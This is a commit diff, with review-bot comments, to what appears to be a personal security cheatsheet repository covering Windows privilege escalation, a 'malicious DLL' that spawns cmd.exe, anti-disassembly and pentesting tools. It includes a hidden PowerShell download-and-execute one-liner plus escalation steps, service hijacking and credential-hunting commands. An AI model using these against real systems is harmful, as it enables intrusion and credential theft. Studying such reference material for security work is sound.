
minor changes

Hans Martin 5 years ago
parent
commit
07fee3b102

+ 5 - 4
cheatsheets/security/malware/createthread.md

@@ -36,12 +36,13 @@ DWORD WINAPI add(LPVOID lpParameters) {
 
 
 
 
 int main() {
 int main() {
-	
+
 	LPDWORD thId = (LPDWORD)malloc(sizeof(LPDWORD));
 	LPDWORD thId = (LPDWORD)malloc(sizeof(LPDWORD));
 	HANDLE hThread = CreateThread(NULL, 0, add, NULL, NULL, thId);
 	HANDLE hThread = CreateThread(NULL, 0, add, NULL, NULL, thId);
-	printf("Thread %d created!
+	printf("Thread %d created!\nHandle@%d\nError? %s",
-Handle@%d
+                thId,
-Error? %s", thId, hThread, GetLastError()?"Yeah probably":"Naah not really");
+                hThread,
+                GetLastError() ? "Yeah probably":"Naah not really");
 
 
 }
 }
 ```
 ```
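Review bot: the reflowed call at `+	printf("Thread %d created!\nHandle@%d\nError? %s",` still hands pointers to `%d`: `thId` is an `LPDWORD`, so the line prints the address of the buffer rather than the thread id (`*thId`), and `hThread` is a `HANDLE`, which should be printed with `%p`. `GetLastError()` is not a reliable success check after `CreateThread`; the documented check is `hThread == NULL`. The unchanged `malloc(sizeof(LPDWORD))` also allocates the size of a pointer rather than `sizeof(DWORD)`; a plain `DWORD thId;` passed as `&thId` would avoid the allocation and the leak.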

+ 0 - 0
cheatsheets/mobile/android-debugging.md → cheatsheets/security/mobile/android-debugging-frida.md


+ 0 - 0
cheatsheets/mobile/android-remount-rw-alternative.md → cheatsheets/security/mobile/android-remount-rw-alternative.md


+ 5 - 1
cheatsheets/security/pentesting/tools.md

@@ -9,12 +9,14 @@ tags: [security]
 ## Reconnaissance:
 ## Reconnaissance:
 
 
 * fierce
 * fierce
+* host
 * dig
 * dig
 * whois
 * whois
 * sparta
 * sparta
 * foca
 * foca
 * recon-ng
 * recon-ng
 
 
+
 ## Vulnerability Scanner:
 ## Vulnerability Scanner:
 
 
 * nikto
 * nikto
@@ -38,10 +40,12 @@ tags: [security]
 * radare2
 * radare2
 * gdb
 * gdb
 * x64dbg
 * x64dbg
+* Ghidra
 
 
 
 
 ## Networking:
 ## Networking:
 
 
+* bettercap ❤
 * macof         // Tool für macflooding
 * macof         // Tool für macflooding
 * arpspoof
 * arpspoof
 * mitmproxy
 * mitmproxy
@@ -51,9 +55,9 @@ tags: [security]
 
 
 ## Fuzzing:
 ## Fuzzing:
 
 
+* AFL
 * zzuf      // Mutation based fuzzer
 * zzuf      // Mutation based fuzzer
 * sully     // Generation based fuzzer
 * sully     // Generation based fuzzer
-* AFL
 * scapy     // is fuzzing network packets
 * scapy     // is fuzzing network packets
 
 
 ## Password Cracking:
 ## Password Cracking:
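Review bot: `+* AFL` is moved to the top of the Fuzzing list but, unlike `zzuf`, `sully` and `scapy` next to it, carries no `//` description; a short one (coverage-guided fuzzer) would keep the list consistent. The unchanged `// Tool für macflooding` in the Networking hunk above is the one German comment left on an otherwise English page.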

+ 1 - 1
cheatsheets/security/reversing/anti_disassembly.md → cheatsheets/security/reversing/anti-disassembly.md

@@ -156,7 +156,7 @@ mov ebp, esp
 ```
 ```
 
 
 
 
-### Misuing Structed Exception Handlers (SEH)
+### Misusing Structed Exception Handlers (SEH)
 
 
 * Use the SEH to confuse Disassemblers
 * Use the SEH to confuse Disassemblers
 * add a custom SE Handler at fs:0x00 with
 * add a custom SE Handler at fs:0x00 with
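Review bot: `+### Misusing Structed Exception Handlers (SEH)` fixes "Misuing" but leaves "Structed"; the heading should read "Misusing Structured Exception Handlers (SEH)".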

+ 0 - 0
cheatsheets/security/reversing/anti_virtualmachine.md → cheatsheets/security/reversing/anti-virtualmachine.md


+ 0 - 0
cheatsheets/security/reversing/calling_conventions.md → cheatsheets/security/reversing/calling-conventions.md


+ 1 - 3
cheatsheets/security/web/php_type_juggling.md → cheatsheets/security/web/php-type-juggling.md

@@ -6,9 +6,7 @@ tags: [security, web]
 
 
 # PHP Type Juggling
 # PHP Type Juggling
 
 
-Reference:
+Reference: [PHPMagicTricks-TypeJuggling.pdf](https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf)
-
-https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
 
 
 PHP has two main comparison modes, lets call them loose (==) and strict (===).
 PHP has two main comparison modes, lets call them loose (==) and strict (===).
 
 

+ 1 - 1
cheatsheets/security/web/php_vulnerabilities.md → cheatsheets/security/web/php-vulnerabilities.md

@@ -4,7 +4,7 @@ categories: [cheatsheets]
 tags: [security, web]
 tags: [security, web]
 ---
 ---
 
 
-# Top 24 PHP Vulnerabilities
+# Examples Vulnerabilities
 
 
 ## 1) Missing Typechecking
 ## 1) Missing Typechecking
 
 
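Review bot: `+# Examples Vulnerabilities` is ungrammatical; "Example Vulnerabilities" or "PHP Vulnerability Examples" reads correctly and still drops the "Top 24" count the old title promised.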

+ 0 - 0
cheatsheets/security/windows/lateral_movement.md → cheatsheets/security/windows/lateral-movement.md


+ 2 - 2
cheatsheets/security/windows/malicious-dll.md

@@ -18,8 +18,8 @@ BOOL APIENTRY DllMain(HMODULE hModule,
     switch (ul_reason_for_call) {
     switch (ul_reason_for_call) {
         case DLL_PROCESS_ATTACH:
         case DLL_PROCESS_ATTACH:
             system("cmd.exe");
             system("cmd.exe");
-        case DLL_THREAT_DETACH:
+        case DLL_PROCESS_DETACH:
-        case DLL_PROCESS_ATTACH:
+        case DLL_THREAT_ATTACH:
         case DLL_THREAT_DETACH:
         case DLL_THREAT_DETACH:
             break;
             break;
     }
     }
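Review bot: `+        case DLL_THREAT_ATTACH:` does not fix the underlying typo: the Win32 reason codes are `DLL_THREAD_ATTACH` and `DLL_THREAD_DETACH`, and the unchanged `case DLL_THREAT_DETACH:` below has the same misspelling, so the snippet will not compile as shown. `DLL_PROCESS_ATTACH` has no `break` and falls through into the other cases; harmless here, but a `break` or a comment would make the intent explicit.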

+ 2 - 2
cheatsheets/security/windows/powershell.md

@@ -30,9 +30,9 @@ Get-Credentials // Nice login field for social engineering
 
 
 3) Load scripts from webserver and execute them (inline and in-memory)
 3) Load scripts from webserver and execute them (inline and in-memory)
 ```
 ```
-powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL-desSkripts'; Parameter
+powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1');
 ```
 ```
-Important:
+**Important:**
 
 
 -> Never use a unknown code from the internet for a client!
 -> Never use a unknown code from the internet for a client!
 
 
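Review bot: the corrected command now closes the `DownloadString(...)` call and drops the dangling `; Parameter`, which is the fix the old line needed. Two small follow-ups in the same hunk: `+**Important:**` sits directly under the closing fence and wants a blank line before it, and the unchanged warning should read "Never use unknown code from the internet".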

+ 0 - 0
cheatsheets/security/windows/windows-local-privilege-escalation_schedtask.md → cheatsheets/security/windows/windows-LPE-schedtask.md


+ 1 - 1
cheatsheets/security/windows/windows-administration.md

@@ -97,7 +97,7 @@ cmd> DRIVERQUERY                        ## Get Driver, can be interesting for 3r
 cmd> sc query                          ## get all services
 cmd> sc query                          ## get all services
 ```
 ```
 
 
-## Getting a Services that are not in C:\Windows
+## Getting services that are not in C:\Windows
 ```
 ```
 wmic service get name, displayname, pathname,startmode|findstr /i "auto"|findstr /i /v "C:\windows\"
 wmic service get name, displayname, pathname,startmode|findstr /i "auto"|findstr /i /v "C:\windows\"
 ```
 ```

+ 30 - 15
cheatsheets/security/windows/windows_privesc_detail.md → cheatsheets/security/windows/windows-local-privesc.md

@@ -6,7 +6,7 @@ tags: [security, windows]
 
 
 # Priviledge Escalation
 # Priviledge Escalation
 
 
-1) Information Gathering
+### 1) Information Gathering
 
 
 Get as much information about the system as possible.
 Get as much information about the system as possible.
 
 
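Review bot: `+### 1) Information Gathering` promotes the step to a heading but skips the `##` level under `# Priviledge Escalation`, and that title still misspells "Privilege" (the same typo recurs as "unpriviledged" further down in this file). Worth fixing while the headings are being touched.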
@@ -28,9 +28,9 @@ Detailed Commands to extract this information can be found in:
 * wmic.md
 * wmic.md
 
 
 
 
-2) Check the Quick Fails
+### 2) Check the Quick Fails
 
 
-2.1) check the patches of the machine
+#### 2.1) check the patches of the machine
 
 
 ```
 ```
 cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn
 cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn
@@ -41,11 +41,13 @@ cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn
 * cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
 * cmd> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
 ```
 ```
 
 
--> windows privchecker script?
+**Windows exploit-checker script:**
 
 
-Metasploit-Module: post/multi/recon/local_exploit_suggester (Windows & Linux)
+* Metasploit-Module: post/multi/recon/local_exploit_suggester (Windows & Linux)
+* https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester
 
 
-2.2) Mass rollout aka sysprep/unattended
+
+#### 2.2) Mass rollout aka sysprep/unattended
 
 
 * for mass-rollout of windows machines, the tool sysprep is used
 * for mass-rollout of windows machines, the tool sysprep is used
 * its possible that the config files are still laying around somewhere
 * its possible that the config files are still laying around somewhere
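Review bot: `+* https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester` is pasted as a bare URL, while the PHP page in this same commit converts its reference into a markdown link; use the same form here. The replaced line `--> windows privchecker script?` was an open question, so the new bold label should make clear whether the linked suggester is the script that was meant.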
@@ -65,7 +67,7 @@ Powersploit-module: Get-UnattendedInstallFile
 Metasploit-module:  post/windows/gather/enum_unattend
 Metasploit-module:  post/windows/gather/enum_unattend
 ```
 ```
 
 
-2.3) Passwords saved in Group Policy Preferences
+#### 2.3) Passwords saved in Group Policy Preferences
 
 
 This is used to add local users via a domain account.
 This is used to add local users via a domain account.
 Passwords are encrypted with AES -> Key was published on MSDN ;)
 Passwords are encrypted with AES -> Key was published on MSDN ;)
@@ -80,7 +82,8 @@ Metasploit-module:  post/windows/gather/credentials/gpp
 ```
 ```
 
 
 
 
-2.4) "AlwaysInstallElevated" Registry Key
+#### 2.4) "AlwaysInstallElevated" Registry Key
+
 This registry key, if set, lets unpriviledged users install .msi Files as NT AUTHORITY\SYSTEM
 This registry key, if set, lets unpriviledged users install .msi Files as NT AUTHORITY\SYSTEM
 Dafuq??
 Dafuq??
 Check the following registry keys: (both must be checked, BUT! if HKLM is checked, you can enable the HKCU one yourself)
 Check the following registry keys: (both must be checked, BUT! if HKLM is checked, you can enable the HKCU one yourself)
@@ -94,7 +97,7 @@ Powersploit-module: Get-RegistryAlwaysInstallElevated
 Metasploit-module:  exploit/windows/local/always_install_elevated
 Metasploit-module:  exploit/windows/local/always_install_elevated
 ```
 ```
 
 
-2.5) Search FS for Password files/password configs
+#### 2.5) Search FS for Password files/password configs
 
 
 The command below will search the file system for file names containing certain keywords. You can
 The command below will search the file system for file names containing certain keywords. You can
 specify as many keywords as you wish.
 specify as many keywords as you wish.
@@ -113,7 +116,7 @@ cmd> reg query HKLM /f password /t REG_SZ /s
 cmd> reg query HKCU /f password /t REG_SZ /s
 cmd> reg query HKCU /f password /t REG_SZ /s
 ```
 ```
 
 
-2.6) Autologon - saved credentials
+#### 2.6) Autologon - saved credentials
 
 
 You can save the credentials in the registry to automaticall login at windows start
 You can save the credentials in the registry to automaticall login at windows start
 
 
@@ -122,9 +125,9 @@ Powersploit: Get-RegistryAutoLogon
 ```
 ```
 
 
 
 
-3) More cool Stuff!
+### 3) More cool Stuff!
 
 
-3.1 Unquoted Service Paths:
+#### 3.1) Unquoted Service Paths:
 
 
 Get Services with a space in the Path an no quotes
 Get Services with a space in the Path an no quotes
 
 
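Review bot: `+#### 3.1) Unquoted Service Paths:` adds the missing `)` for consistency with 2.x, but the unchanged description below it reads "a space in the Path an no quotes"; it should be "and no quotes". The trailing colons on the 3.x headings are also inconsistent with the 2.x headings, which have none.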
@@ -134,7 +137,7 @@ Metasploit-module: exploit/windows/local/trusted_service_path
 ```
 ```
 
 
 
 
-3.2 Services, with file access:
+#### 3.2) Services, with file access:
 
 
 Lookout for services, where the current user has access to the path of the binary
 Lookout for services, where the current user has access to the path of the binary
 exploit: change binary to your own exe
 exploit: change binary to your own exe
@@ -145,7 +148,7 @@ Metasploit-module: [..]
 ```
 ```
 
 
 
 
-3.3 Services, with service access:
+#### 3.3) Services, with service access:
 
 
 Lookout for services, where the current user has access to the service itself
 Lookout for services, where the current user has access to the service itself
 exploit: change the path of the service executable to your own exe
 exploit: change the path of the service executable to your own exe
@@ -155,9 +158,21 @@ Powersploit-module: Get-ModifiableService
 Metasploit-module: [..]
 Metasploit-module: [..]
 ```
 ```
 
 
-3.4 DLL Load order hijacking:
+#### 3.4) DLL Load order hijacking:
 
 
 Search a executable which loads a dll from a path where you can write too, or
 Search a executable which loads a dll from a path where you can write too, or
 one that loads an dll from a path, where you have access to a path earlier in the load order
 one that loads an dll from a path, where you have access to a path earlier in the load order
 
 
 Example: file loads dll custom.dll which is in C:\Windows\System32
 Example: file loads dll custom.dll which is in C:\Windows\System32
+
+
+### 4) Passwords
+
+There are the following passwords (stored) on a windows machine:
+
+* LM Hashes (old and unsafe, 2 * 7 Chars DES)
+* NTLM Hashes (since vista, md4(unicode(password))
+* DCC (Domain Cached Credentials) (mostly MsCacheV2 -> PBKDF2(...))
+* Plaintext (Service Passwords in the Registry)
+
+-> pretty much everything can be captured using mimikatz
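Review bot: `+* NTLM Hashes (since vista, md4(unicode(password))` is missing a closing parenthesis (three opened, two closed), and the "since vista" qualifier is worth double-checking against the LM bullet, since the Vista-era change concerns LM hash storage rather than the NT hash itself. This `### 4) Passwords` block is lifted verbatim from the deleted windows_privesc.md, which is fine, but note that file's tools list is not carried over anywhere in this commit.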

+ 46 - 0
cheatsheets/security/windows/windows-services.md

@@ -0,0 +1,46 @@
+---
+title: services.md
+categories: [cheatsheets]
+---
+# Services
+
+Services run without their own Process. Services are run as background jobs.
+Run & Scheduled by the Windows Service Manager (WSM) 
+
+Services got SYSTEM Priviledge (only as Administrator installable).
+Services are also a Way of Persistance (can be run on startup)
+
+## Win32 API Functions to manipulate Servies: 
+* OpenSCManager(): Returns HANDLE to a Service (ServiceControlManager)
+* CreateService(): Creates a new Service, and adds it to the SC Manager
+* StartService(): Starts a Service if set to "manually"
+
+## ServiceTypes:
+
+Different ServiceTypes that tell how a Service is executing ('Type'-Field in the Registry)
+
+* WIN32_SHARE_PROCESS: Code in a DLL, run from svchost.exe
+* WIN32_OWN_PROCESS: Code in a exe, runs a individuall Process
+* KERNEL_DRIVER: Used for loading Code into the Kernel
+
+Each Service gets a Registry Entry @ HKLM/SYSTEM/CurrentControlSet/Services/
+
+
+Access Service Information with 'sc qc "Service Name"'
+
+example: sc qc "VMware NAT Service"
+```
+C:\>sc qc "WinNat"
+[SC] QueryServiceConfig ERFOLG
+
+SERVICE_NAME: WinNat
+        TYPE               : 1  KERNEL_DRIVER
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : system32\drivers\winnat.sys
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Windows-NAT-Treiber
+        DEPENDENCIES       : Tcpip
+        SERVICE_START_NAME :
+```
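Review bot: the new file contradicts itself on the first point it makes: `+Services run without their own Process.` is followed by `+* WIN32_OWN_PROCESS: Code in a exe, runs a individuall Process`; the opening sentence should say that services run in the background, some inside a shared `svchost.exe` and some in their own process. `+* OpenSCManager(): Returns HANDLE to a Service (ServiceControlManager)` conflates the two: `OpenSCManager` returns a handle to the Service Control Manager, and the handle to an individual service comes from `OpenService`, which the list should add. `+* StartService(): Starts a Service if set to "manually"` is muddled; it starts a service regardless of its start type, the `DEMAND_START` value in the example output below being the "manual" case. The worked example announces `+example: sc qc "VMware NAT Service"` but the captured output is for `sc qc "WinNat"`; pick one so the text and output agree. The registry path `HKLM/SYSTEM/CurrentControlSet/Services/` should use backslashes, the front matter `+title: services.md` should be a title and lacks the `tags:` the sibling pages carry, and "Servies", "Priviledge", "Persistance" and "individuall" need spelling fixes.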

+ 0 - 45
cheatsheets/security/windows/windows_privesc.md

@@ -1,45 +0,0 @@
----
-title: Windows Priviledge Escalation
-categories: [cheatsheets]
-tags: [security, windows]
----
-
-# Windows Hacking - Priviledge Escalation
-
-1) Tools:
-
-    * Mimikatz
-    * Powersploit (github.com/PowershellMafia/powersploit)
-    * Empire
-    * PsAttack
-    * BloodHoundAD (github.com/BloodHoundAD/Bloodhound)
-
-2) Passwords and Storage
-
-There are the following passwords (stored) on a windows machine:
-
-* LM Hashes (old and unsafe, 2 * 7 Chars DES)
-* NTLM Hashes (since vista, md4(unicode(password))
-* DCC (Domain Cached Credentials) (mostly MsCacheV2 -> PBKDF2(...))
-* Plaintext (Service Passwords in the Registry)
-
--> pretty much everything can be captured using mimikatz
-
-3) Services
-
-```
-a) Check unquoted ServicePaths              (powersploit::Get-ServiceUnquoted)
-b) Check Service Permissions                (powersploit::Get-ModifiableService)
-c) Check Service Executable Permissions     (powersploit::Get-ModifiableServiceFile)
-```
-Get details about a service:
-
-```
-native:     sc query [<name>]
-psploit:    Get-ServiceDetail [<name>]
-```
-
-
-
-
-
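Review bot: deleting this file drops the `1) Tools:` list (Mimikatz, Powersploit, Empire, PsAttack, BloodHoundAD) and the `3) Services` quick checks (`Get-ServiceUnquoted`, `Get-ModifiableService`, `Get-ModifiableServiceFile`, `sc query` / `Get-ServiceDetail`); only the `2) Passwords and Storage` section is moved into windows-local-privesc.md by this commit. The tools list in particular has no equivalent there, so either carry it over or say in the commit message that it is dropped on purpose.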

+ 0 - 0
cheatsheets/mobile/android_audit.md → checklists/mobile/android_audit.md